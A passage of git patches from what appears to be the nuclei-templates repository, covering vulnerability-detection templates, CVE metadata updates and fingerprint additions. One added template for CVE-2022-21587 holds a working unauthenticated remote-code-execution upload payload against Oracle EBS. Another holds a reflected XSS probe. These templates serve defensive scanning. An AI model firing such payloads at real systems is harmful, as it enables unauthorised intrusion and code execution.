<ds:SignatureValue>RbBWB6AIP8AN1wTZN6YYCKdnClFoh8GqmU2RXoyjmkr6I0AP371IS7jxSMS2zxFCdZ80kInvgVuaEt3yQmcq33/d6yGeOxZU7kF1f1D/da+oKmEoj4s6PQcvaRFNp+RfOxMECBWVTAxzQiH/OUmoL7kyZUhUwP9G8Yk0tksoV9pSEXUozSq+I5KEN4ehXVjqnIj04mF6Zx6cjPm4hciNMw1UAfANhfq7VC5zj6VaQfz7LrY4GlHoALMMqebNYkEkf2N1kDKiAEKVePSo1vHO0AF++alQRJO47c8kgzld1xy5ECvDc7uYwuDJo3KYk5hQ8NSwvana7KdlJeD62GzPlw==</ds:SignatureValue> <ds:KeyInfo/> </ds:Signature> </Assertion> </samlp:Response>' requests: - raw: @@ -29,7 +29,7 @@ requests: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - SAMLResponse={{url_encode(base64(body))}}&RelayState= + SAMLResponse={{url_encode(base64(SAMLResponse))}}&RelayState= matchers-condition: and matchers: @@ -45,4 +45,4 @@ requests: - type: status status: - - 500 \ No newline at end of file + - 500 From b5c1cc52d7d674e485aa4dd19ddc359908ac1cd4 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 20 Jan 2023 11:57:07 +0000 Subject: [PATCH 1045/1133] Auto Generated New Template Addition List [Fri Jan 20 11:57:06 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index b83f88dab4..409b9c675b 100644 --- a/.new-additions +++ b/.new-additions @@ -10,6 +10,7 @@ cves/2022/CVE-2022-28117.yaml cves/2022/CVE-2022-29153.yaml cves/2022/CVE-2022-36537.yaml cves/2022/CVE-2022-44877.yaml +cves/2022/CVE-2022-47966.yaml default-logins/empire/empirec2-default-login.yaml exposed-panels/episerver-panel.yaml exposed-panels/freepbx-administration-panel.yaml From 3f4c06d8406accb332b01de0d6d39aff7971e6d2 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 20 Jan 2023 17:34:24 +0530 Subject: [PATCH 1046/1133] enhance template --- exposed-panels/tooljet-panel.yaml | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/exposed-panels/tooljet-panel.yaml b/exposed-panels/tooljet-panel.yaml index ef38b9d121..e135155741 100644 --- a/exposed-panels/tooljet-panel.yaml +++ b/exposed-panels/tooljet-panel.yaml @@ -7,13 +7,17 @@ info: metadata: verified: true shodan-query: title:"ToolJet - Dashboard" - tags: panel,tooljet,login + tags: panel,tooljet requests: - method: GET path: + - "{{BaseURL}}" - "{{BaseURL}}/login?redirectTo=/" + stop-at-first-match: true + host-redirects: true + max-redirects: 2 matchers-condition: and matchers: - type: word From 1605d2da02664485f982dc600a5592a9200449f0 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 20 Jan 2023 12:08:22 +0000 Subject: [PATCH 1047/1133] Auto Generated New Template Addition List [Fri Jan 20 12:08:22 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 409b9c675b..67081f43d7 100644 --- a/.new-additions +++ b/.new-additions @@ -23,6 +23,7 @@ exposed-panels/saltgui-panel.yaml exposed-panels/sap-cloud-analytics.yaml exposed-panels/sap-successfactors-detect.yaml exposed-panels/storybook-panel.yaml +exposed-panels/tooljet-panel.yaml exposures/backups/froxlor-database-backup.yaml exposures/configs/ovpn-config-exposed.yaml exposures/tokens/amazon/aws-access-secret-key.yaml From 856857d9f92ec07b178ebb5d56d85f9a9f6813c2 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 20 Jan 2023 12:12:54 +0000 Subject: [PATCH 1049/1133] Auto Generated CVE annotations [Fri Jan 20 12:12:54 UTC 2023] :robot: --- cves/2018/CVE-2018-16979.yaml | 5 ++++- cves/2022/CVE-2022-47966.yaml | 2 +- 2 files changed, 5 insertions(+), 2 deletions(-) diff --git a/cves/2018/CVE-2018-16979.yaml b/cves/2018/CVE-2018-16979.yaml index d97874d556..3d076ff28e 100644 --- a/cves/2018/CVE-2018-16979.yaml +++ b/cves/2018/CVE-2018-16979.yaml @@ -10,9 +10,12 @@ info: - https://github.com/howchen/howchen/issues/4 - https://nvd.nist.gov/vuln/detail/CVE-2018-16979 classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 cve-id: CVE-2018-16979 + cwe-id: CWE-113 metadata: - verified: true + verified: "true" tags: cve,cve2018,crlf,mostra,mostracms,cms requests: diff --git a/cves/2022/CVE-2022-47966.yaml b/cves/2022/CVE-2022-47966.yaml index 63ce07b69f..a08c0e2d3f 100644 --- a/cves/2022/CVE-2022-47966.yaml +++ b/cves/2022/CVE-2022-47966.yaml @@ -14,8 +14,8 @@ info: classification: cve-id: CVE-2022-47966 metadata: - verified: "true" shodan-query: title:"ManageEngine" + verified: "true" tags: cve,cve2022,rce,zoho,manageengine,oast variables: From 3005cd3107a345ae134788d87c0a5c526b86540a Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 20 Jan 2023 17:57:24 +0530 Subject: [PATCH 1050/1133] updated matchers --- exposed-panels/mylittlebackup-panel.yaml | 20 +++++++++++++------- 1 file changed, 13 insertions(+), 7 deletions(-) diff --git a/exposed-panels/mylittlebackup-panel.yaml b/exposed-panels/mylittlebackup-panel.yaml index 9ab5f004b6..38b55b13ad 100644 --- a/exposed-panels/mylittlebackup-panel.yaml +++ b/exposed-panels/mylittlebackup-panel.yaml @@ -1,7 +1,7 @@ id: mylittlebackup-panel info: - name: myLittleBackup Panel + name: MyLittleBackup Panel author: nullfuzz severity: info description: | @@ -11,7 +11,7 @@ info: metadata: verified: true shodan-query: http.html:"myLittleBackup" - tags: panel,mylittlebackup,login + tags: panel,mylittlebackup requests: - method: GET @@ -23,9 +23,15 @@ requests: stop-at-first-match: true host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - - type: dsl - dsl: - - "status_code == 200" - - "contains(body, '<title>myLittleBackup for SQL Server')" - condition: and \ No newline at end of file + - type: regex + part: body + regex: + - 'content=".*(myLittleBackup).*' + - '<title>myLittleBackup for SQL Server' + condition: or + + - type: status + status: + - 200 From 67602e6275d5074e19a658a441a27e7d1fcf8e9d Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 20 Jan 2023 12:50:32 +0000 Subject: [PATCH 1052/1133] Auto Generated New Template Addition List [Fri Jan 20 12:50:32 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 67081f43d7..ff7940a6cd 100644 --- a/.new-additions +++ b/.new-additions @@ -19,6 +19,7 @@ exposed-panels/machform-admin-panel.yaml exposed-panels/modoboa-panel.yaml exposed-panels/monstra-admin-panel.yaml exposed-panels/mylittleadmin-panel.yaml +exposed-panels/mylittlebackup-panel.yaml exposed-panels/saltgui-panel.yaml exposed-panels/sap-cloud-analytics.yaml exposed-panels/sap-successfactors-detect.yaml From 8cbe21554f21b38d897a15fc44887cd16b795c63 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 20 Jan 2023 13:34:01 +0000 Subject: [PATCH 1054/1133] Auto Generated CVE annotations [Fri Jan 20 13:34:01 UTC 2023] :robot: --- cves/2017/CVE-2017-5638.yaml | 2 +- cves/2022/CVE-2022-47945.yaml | 8 ++++++-- 2 files changed, 7 insertions(+), 3 deletions(-) diff --git a/cves/2017/CVE-2017-5638.yaml b/cves/2017/CVE-2017-5638.yaml index 4553a953d9..01595fb679 100644 --- a/cves/2017/CVE-2017-5638.yaml +++ b/cves/2017/CVE-2017-5638.yaml @@ -17,8 +17,8 @@ info: cve-id: CVE-2017-5638 cwe-id: CWE-20 metadata: - verified: true shodan-query: html:"Apache Struts" + verified: "true" tags: cve,cve2017,apache,kev,msf,struts,rce requests: diff --git a/cves/2022/CVE-2022-47945.yaml b/cves/2022/CVE-2022-47945.yaml index 1308bd2852..1c551d9087 100644 --- a/cves/2022/CVE-2022-47945.yaml +++ b/cves/2022/CVE-2022-47945.yaml @@ -9,12 +9,16 @@ info: reference: - https://tttang.com/archive/1865/ - https://nvd.nist.gov/vuln/detail/CVE-2022-47945 + - https://github.com/top-think/framework/compare/v6.0.13...v6.0.14 + - https://github.com/top-think/framework/commit/c4acb8b4001b98a0078eda25840d33e295a7f099 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2022-47945 metadata: - verified: true - shodan-query: title:"Thinkphp" fofa-query: header="think_lang" + shodan-query: title:"Thinkphp" + verified: "true" tags: cve,cve2022,thinkphp,lfi requests: From 55b9616948257b7ece1c445faa5e2afaa9ca6112 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Fri, 20 Jan 2023 19:45:46 +0530 Subject: [PATCH 1055/1133] Create CVE-2022-21587.yaml --- cves/2022/CVE-2022-21587.yaml | 71 +++++++++++++++++++++++++++++++++++ 1 file changed, 71 insertions(+) create mode 100644 cves/2022/CVE-2022-21587.yaml diff --git a/cves/2022/CVE-2022-21587.yaml b/cves/2022/CVE-2022-21587.yaml new file mode 100644 index 0000000000..da3c03c067 --- /dev/null +++ b/cves/2022/CVE-2022-21587.yaml @@ -0,0 +1,71 @@ +id: CVE-2022-21587 + +info: + name: Oracle EBS Unauthenticated - Remote Code Execution + author: rootxharsh,iamnoooob + severity: critical + description: + reference: + - https://blog.viettelcybersecurity.com/cve-2022-21587-oracle-e-business-suite-unauth-rce/ + - https://www.oracle.com/security-alerts/cpuoct2022.html + - https://nvd.nist.gov/vuln/detail/CVE-2022-21587 + tags: cve,cve2022,rce,oast,intrusive,oracle,ebs,unauth + +requests: + - raw: + - | + POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv + + ------WebKitFormBoundaryZsMro0UsAQYLDZGv + Content-Disposition: form-data; name="bne:uueupload" + + TRUE + ------WebKitFormBoundaryZsMro0UsAQYLDZGv + Content-Disposition: form-data; name="uploadfilename";filename="testzuue.zip" + + begin 664 test.zip + M4$L#!!0``````"]P-%;HR5LG>@```'H```!#````+BXO+BXO+BXO+BXO+BXO + M1DU77TAO;64O3W)A8VQE7T5"4RUA<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9. + M1%=24BYP;'5S92!#1TD["G!R:6YT($-'23HZ:&5A9&5R*"`M='EP92`]/B`G + M=&5X="]P;&%I;B<@*3L*;7D@)&-M9"`](")E8VAO($YU8VQE:2U#5D4M,C`R + M,BTR,34X-R(["G!R:6YT('-Y<W1E;2@D8VUD*3L*97AI="`P.PH*4$L!`A0# + M%```````+W`T5NC)6R=Z````>@```$,``````````````+2!`````"XN+RXN + M+RXN+RXN+RXN+T9-5U](;VUE+T]R86-L95]%0E,M87!P,2]C;VUM;VXO<V-R + G:7!T<R]T>&M&3D174E(N<&Q02P4&``````$``0!Q````VP`````` + ` + end + ------WebKitFormBoundaryZsMro0UsAQYLDZGv-- + + - | + GET /OA_CGI/FNDWRR.exe HTTP/1.1 + Host: {{Hostname}} + + - | + POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv + + ------WebKitFormBoundaryZsMro0UsAQYLDZGv + Content-Disposition: form-data; name="bne:uueupload" + + TRUE + ------WebKitFormBoundaryZsMro0UsAQYLDZGv + Content-Disposition: form-data; name="uploadfilename";filename="testzuue.zip" + + begin 664 test.zip + M4$L#!!0``````&UP-%:3!M<R`0````$```!#````+BXO+BXO+BXO+BXO+BXO + M1DU77TAO;64O3W)A8VQE7T5"4RUA<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9. + M1%=24BYP;`I02P$"%`,4``````!M<#16DP;7,@$````!````0P`````````` + M````M($`````+BXO+BXO+BXO+BXO+BXO1DU77TAO;64O3W)A8VQE7T5"4RUA + M<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9.1%=24BYP;%!+!08``````0`!`'$` + (``!B```````` + ` + end + + matchers: + - type: word + part: body_2 + words: + - Nuclei-CVE-2022-21587 From d5a6bf60e5021082f28382d1cf88dcbe492925a1 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 20 Jan 2023 19:47:33 +0530 Subject: [PATCH 1056/1133] Create CVE-2022-1168.yaml --- cves/2022/CVE-2022-1168.yaml | 38 ++++++++++++++++++++++++++++++++++++ 1 file changed, 38 insertions(+) create mode 100644 cves/2022/CVE-2022-1168.yaml diff --git a/cves/2022/CVE-2022-1168.yaml b/cves/2022/CVE-2022-1168.yaml new file mode 100644 index 0000000000..d8e7a96fed --- /dev/null +++ b/cves/2022/CVE-2022-1168.yaml @@ -0,0 +1,38 @@ +id: CVE-2022-1168 + +info: + name: JobSearch < 1.5.1 - Cross-Site Scripting + author: Akincibor + severity: medium + description: | + There is a Cross-Site Scripting vulnerability in the JobSearch WP JobSearch WordPress plugin before 1.5.1. + reference: + - https://wpscan.com/vulnerability/bcf38e87-011e-4540-8bfb-c93443a4a490 + - https://nvd.nist.gov/vuln/detail/CVE-2022-1168 + classification: + cve-id: CVE-2022-1168 + metadata: + verified: true + google-dork: inurl:"wp-content/plugins/wp-jobsearch" + tags: cve,cve2022,wp-plugin,wp,wordpress,xss,wp-jobsearch" + +requests: + - method: GET + path: + - '{{BaseURL}}/plugins/jobsearch/?search_title=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert%28domain%29%3E&ajax_filter=true&posted=all&sort-by=recent' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "<img src=x onerror=alert(domain)>" + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 404 From c512b2ccf275f713d43718f99f2b99598e19ef0f Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 20 Jan 2023 15:36:46 +0000 Subject: [PATCH 1057/1133] Auto Generated New Template Addition List [Fri Jan 20 15:36:46 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index ff7940a6cd..6fe70715ac 100644 --- a/.new-additions +++ b/.new-additions @@ -10,6 +10,7 @@ cves/2022/CVE-2022-28117.yaml cves/2022/CVE-2022-29153.yaml cves/2022/CVE-2022-36537.yaml cves/2022/CVE-2022-44877.yaml +cves/2022/CVE-2022-47945.yaml cves/2022/CVE-2022-47966.yaml default-logins/empire/empirec2-default-login.yaml exposed-panels/episerver-panel.yaml From a928636ba9fbe47a826b24715567f9374de4204d Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Fri, 20 Jan 2023 21:41:38 +0530 Subject: [PATCH 1058/1133] Update CVE-2022-21587.yaml --- cves/2022/CVE-2022-21587.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-21587.yaml b/cves/2022/CVE-2022-21587.yaml index da3c03c067..36ff039823 100644 --- a/cves/2022/CVE-2022-21587.yaml +++ b/cves/2022/CVE-2022-21587.yaml @@ -4,7 +4,8 @@ info: name: Oracle EBS Unauthenticated - Remote Code Execution author: rootxharsh,iamnoooob severity: critical - description: + description: | + Vulnerability in the Oracle Web Applications Desktop Integrator product of Oracle E-Business Suite (component: Upload). Supported versions that are affected are 12.2.3-12.2.11. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Web Applications Desktop Integrator. Successful attacks of this vulnerability can result in takeover of Oracle Web Applications Desktop Integrator. reference: - https://blog.viettelcybersecurity.com/cve-2022-21587-oracle-e-business-suite-unauth-rce/ - https://www.oracle.com/security-alerts/cpuoct2022.html From 9ae9c4f1f3a725a9a08076bea96179903e67f6e7 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 20 Jan 2023 16:15:52 +0000 Subject: [PATCH 1059/1133] Auto Generated New Template Addition List [Fri Jan 20 16:15:52 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 6fe70715ac..591a9af1a7 100644 --- a/.new-additions +++ b/.new-additions @@ -6,6 +6,7 @@ cves/2018/CVE-2018-11473.yaml cves/2018/CVE-2018-16979.yaml cves/2020/CVE-2020-23697.yaml cves/2022/CVE-2022-0234.yaml +cves/2022/CVE-2022-21587.yaml cves/2022/CVE-2022-28117.yaml cves/2022/CVE-2022-29153.yaml cves/2022/CVE-2022-36537.yaml From 04c8f2ae92ce78555dd969726bb1e854e597419a Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 20 Jan 2023 16:31:57 +0000 Subject: [PATCH 1061/1133] Auto Generated CVE annotations [Fri Jan 20 16:31:57 UTC 2023] :robot: --- cves/2022/CVE-2022-21587.yaml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/cves/2022/CVE-2022-21587.yaml b/cves/2022/CVE-2022-21587.yaml index 36ff039823..563b078359 100644 --- a/cves/2022/CVE-2022-21587.yaml +++ b/cves/2022/CVE-2022-21587.yaml @@ -10,6 +10,10 @@ info: - https://blog.viettelcybersecurity.com/cve-2022-21587-oracle-e-business-suite-unauth-rce/ - https://www.oracle.com/security-alerts/cpuoct2022.html - https://nvd.nist.gov/vuln/detail/CVE-2022-21587 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-21587 tags: cve,cve2022,rce,oast,intrusive,oracle,ebs,unauth requests: From 914fa2bf9f82ae24285d1866fbac685905326b75 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 20 Jan 2023 16:32:29 +0000 Subject: [PATCH 1062/1133] Auto README Update [Fri Jan 20 16:32:29 UTC 2023] :robot: --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index f0f632e771..696880e3b4 100644 --- a/README.md +++ b/README.md @@ -53,7 +53,7 @@ An overview of the nuclei template project, including statistics on unique tags, | lfi | 522 | 0x_akoko | 171 | default-logins | 122 | | | | | | cve2021 | 375 | ritikchaddha | 167 | file | 78 | | | | | -**336 directories, 5244 files**. +**337 directories, 5307 files**. </td> </tr> From ffac642054b6ecdb7632f8694658271f62e4f49f Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sat, 21 Jan 2023 04:01:57 +0000 Subject: [PATCH 1063/1133] Auto WordPress Plugins Update [Sat Jan 21 04:01:57 UTC 2023] :robot: --- helpers/wordpress/plugins/redux-framework.txt | 2 +- helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt | 2 +- helpers/wordpress/plugins/webp-converter-for-media.txt | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/helpers/wordpress/plugins/redux-framework.txt b/helpers/wordpress/plugins/redux-framework.txt index 99ed85a423..a6b172f58f 100644 --- a/helpers/wordpress/plugins/redux-framework.txt +++ b/helpers/wordpress/plugins/redux-framework.txt @@ -1 +1 @@ -4.3.22 \ No newline at end of file +4.3.24 \ No newline at end of file diff --git a/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt b/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt index cc6612c36e..a6254504e4 100644 --- a/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt +++ b/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt @@ -1 +1 @@ -2.3.0 \ No newline at end of file +2.3.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/webp-converter-for-media.txt b/helpers/wordpress/plugins/webp-converter-for-media.txt index 25c1b355a1..2a06a418a7 100644 --- a/helpers/wordpress/plugins/webp-converter-for-media.txt +++ b/helpers/wordpress/plugins/webp-converter-for-media.txt @@ -1 +1 @@ -5.6.3 \ No newline at end of file +5.6.4 \ No newline at end of file From b0386dbd4cb236840b4708c93b05818b5847fb8c Mon Sep 17 00:00:00 2001 From: lu4nx <lx@shellcodes.org> Date: Sat, 21 Jan 2023 17:30:14 +0800 Subject: [PATCH 1064/1133] Add Hunchentoot httpd --- technologies/fingerprinthub-web-fingerprints.yaml | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/technologies/fingerprinthub-web-fingerprints.yaml b/technologies/fingerprinthub-web-fingerprints.yaml index 95698a9ff2..2ac8d6b0af 100755 --- a/technologies/fingerprinthub-web-fingerprints.yaml +++ b/technologies/fingerprinthub-web-fingerprints.yaml @@ -15102,4 +15102,10 @@ requests: words: - "Server: OpenBSD httpd" + - type: word + name: Hunchentoot + part: header + words: + - "Server: Hunchentoot" + # Enhanced by cs on 2022/02/08 From 6b7eb82c3de493ef5ca9fb36ec074761f6636f51 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sat, 21 Jan 2023 15:04:54 +0530 Subject: [PATCH 1065/1133] updated matcher --- cves/2022/CVE-2022-1168.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/cves/2022/CVE-2022-1168.yaml b/cves/2022/CVE-2022-1168.yaml index d8e7a96fed..0b5ae56662 100644 --- a/cves/2022/CVE-2022-1168.yaml +++ b/cves/2022/CVE-2022-1168.yaml @@ -27,6 +27,8 @@ requests: part: body words: - "<img src=x onerror=alert(domain)>" + - "wp-jobsearch" + condition: and - type: word part: header From a02b1675dc72e2ea3fde4cf1d9f8813389e6359d Mon Sep 17 00:00:00 2001 From: lu4nx <lx@shellcodes.org> Date: Sat, 21 Jan 2023 23:31:06 +0800 Subject: [PATCH 1066/1133] Add Tengine web server --- technologies/tech-detect.yaml | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/technologies/tech-detect.yaml b/technologies/tech-detect.yaml index d8cd8d793c..bfb57f33a0 100644 --- a/technologies/tech-detect.yaml +++ b/technologies/tech-detect.yaml @@ -3675,3 +3675,9 @@ requests: part: header words: - "X-Powered-By: Sails" + + - type: word + name: Tengine + part: header + words: + - "Server: Tengine" From 6692f0a7eeb1d87b00b03055f5a0776084deaf1f Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sat, 21 Jan 2023 16:04:08 +0000 Subject: [PATCH 1067/1133] Auto Generated New Template Addition List [Sat Jan 21 16:04:08 UTC 2023] :robot: --- .new-additions | 63 +------------------------------------------------- 1 file changed, 1 insertion(+), 62 deletions(-) diff --git a/.new-additions b/.new-additions index 591a9af1a7..644e83f1ee 100644 --- a/.new-additions +++ b/.new-additions @@ -1,62 +1 @@ -.github/scripts/yaml2json.go -cves/2010/CVE-2010-1429.yaml -cves/2017/CVE-2017-11165.yaml -cves/2018/CVE-2018-11227.yaml -cves/2018/CVE-2018-11473.yaml -cves/2018/CVE-2018-16979.yaml -cves/2020/CVE-2020-23697.yaml -cves/2022/CVE-2022-0234.yaml -cves/2022/CVE-2022-21587.yaml -cves/2022/CVE-2022-28117.yaml -cves/2022/CVE-2022-29153.yaml -cves/2022/CVE-2022-36537.yaml -cves/2022/CVE-2022-44877.yaml -cves/2022/CVE-2022-47945.yaml -cves/2022/CVE-2022-47966.yaml -default-logins/empire/empirec2-default-login.yaml -exposed-panels/episerver-panel.yaml -exposed-panels/freepbx-administration-panel.yaml -exposed-panels/ldap-account-manager-panel.yaml -exposed-panels/machform-admin-panel.yaml -exposed-panels/modoboa-panel.yaml -exposed-panels/monstra-admin-panel.yaml -exposed-panels/mylittleadmin-panel.yaml -exposed-panels/mylittlebackup-panel.yaml -exposed-panels/saltgui-panel.yaml -exposed-panels/sap-cloud-analytics.yaml -exposed-panels/sap-successfactors-detect.yaml -exposed-panels/storybook-panel.yaml -exposed-panels/tooljet-panel.yaml -exposures/backups/froxlor-database-backup.yaml -exposures/configs/ovpn-config-exposed.yaml -exposures/tokens/amazon/aws-access-secret-key.yaml -file/keys/stackhawk-api-key.yaml -iot/snapdrop-detect.yaml -misconfiguration/aem/aem-childrenlist-xss.yaml -misconfiguration/apache/kafka-manager-unauth.yaml -misconfiguration/installer/impresspages-installer.yaml -misconfiguration/installer/monstra-installer.yaml -misconfiguration/installer/orangehrm-installer.yaml -misconfiguration/installer/pmm-installer.yaml -misconfiguration/mobiproxy-dashboard.yaml -misconfiguration/ntopng-traffic-dashboard.yaml -misconfiguration/phpcli-stack-trace.yaml -misconfiguration/springboot/spring-eureka.yaml -misconfiguration/unauth-ldap-account-manager.yaml -misconfiguration/webdav-enabled.yaml -technologies/citrix-hypervisor-page.yaml -technologies/dash-panel-detect.yaml -technologies/default-cakephp-page.yaml -technologies/default-runcloud-page.yaml -technologies/default-symfony-page.yaml -technologies/default-tengine-page.yaml -technologies/lucy-admin-panel.yaml -technologies/monstracms-detect.yaml -technologies/ntop-detect.yaml -technologies/rsshub-detect.yaml -technologies/wordpress/plugins/otter-blocks.yaml -technologies/wordpress/plugins/webp-express.yaml -technologies/xerox-workcentre-detect.yaml -token-spray/api-ipdata.yaml -token-spray/api-ipinfo.yaml -vulnerabilities/froxlor-xss.yaml +cves/2022/CVE-2022-1168.yaml From 01201055c1f6c160875f2e85bf36f5b9528bed95 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sat, 21 Jan 2023 16:19:45 +0000 Subject: [PATCH 1068/1133] Auto Generated CVE annotations [Sat Jan 21 16:19:45 UTC 2023] :robot: --- cves/2017/CVE-2017-7615.yaml | 2 +- cves/2018/CVE-2018-17431.yaml | 2 +- cves/2018/CVE-2018-19365.yaml | 6 +++--- cves/2022/CVE-2022-1168.yaml | 8 ++++++-- 4 files changed, 11 insertions(+), 7 deletions(-) diff --git a/cves/2017/CVE-2017-7615.yaml b/cves/2017/CVE-2017-7615.yaml index 4181cd4b74..6293978354 100644 --- a/cves/2017/CVE-2017-7615.yaml +++ b/cves/2017/CVE-2017-7615.yaml @@ -18,7 +18,7 @@ info: - http://www.openwall.com/lists/oss-security/2017/04/16/2 - https://nvd.nist.gov/vuln/detail/CVE-2017-7615 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2017-7615 cwe-id: CWE-640 diff --git a/cves/2018/CVE-2018-17431.yaml b/cves/2018/CVE-2018-17431.yaml index b9b6edfa04..405069c686 100644 --- a/cves/2018/CVE-2018-17431.yaml +++ b/cves/2018/CVE-2018-17431.yaml @@ -11,7 +11,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2018-17431 - https://github.com/Fadavvi/CVE-2018-17431-PoC#confirmation-than-bug-exist-2018-09-25-ticket-id-xwr-503-79437 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-17431 cwe-id: CWE-287 diff --git a/cves/2018/CVE-2018-19365.yaml b/cves/2018/CVE-2018-19365.yaml index b27127cfd2..c84cf477f4 100644 --- a/cves/2018/CVE-2018-19365.yaml +++ b/cves/2018/CVE-2018-19365.yaml @@ -3,15 +3,15 @@ id: CVE-2018-19365 info: name: Wowza Streaming Engine Manager 4.7.4.01 - Directory Traversal author: 0x_Akoko - severity: high + severity: critical description: Wowza Streaming Engine 4.7.4.01 allows traversal of the directory structure and retrieval of a file via a remote, specifically crafted HTTP request to the REST API. reference: - https://blog.gdssecurity.com/labs/2019/2/11/wowza-streaming-engine-manager-directory-traversal-and-local.html - https://www.cvedetails.com/cve/CVE-2018-19365 - https://raw.githubusercontent.com/WowzaMediaSystems/public_cve/main/wowza-streaming-engine/CVE-2018-19365.txt classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H + cvss-score: 9.1 cve-id: CVE-2018-19365 cwe-id: CWE-22 tags: cve,cve2018,wowza,lfi diff --git a/cves/2022/CVE-2022-1168.yaml b/cves/2022/CVE-2022-1168.yaml index 0b5ae56662..84ceabd167 100644 --- a/cves/2022/CVE-2022-1168.yaml +++ b/cves/2022/CVE-2022-1168.yaml @@ -9,12 +9,16 @@ info: reference: - https://wpscan.com/vulnerability/bcf38e87-011e-4540-8bfb-c93443a4a490 - https://nvd.nist.gov/vuln/detail/CVE-2022-1168 + - https://codecanyon.net/item/jobsearch-wp-job-board-wordpress-plugin/21066856 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 cve-id: CVE-2022-1168 + cwe-id: CWE-79 metadata: - verified: true google-dork: inurl:"wp-content/plugins/wp-jobsearch" - tags: cve,cve2022,wp-plugin,wp,wordpress,xss,wp-jobsearch" + verified: "true" + tags: wp-jobsearch",wpscan,cve,cve2022,wp-plugin,wp,wordpress,xss requests: - method: GET From c1db03058c017fba4600466139bf9208eab0b2ce Mon Sep 17 00:00:00 2001 From: Fabian Affolter <mail@fabian-affolter.ch> Date: Sat, 21 Jan 2023 23:57:19 +0100 Subject: [PATCH 1070/1133] Add 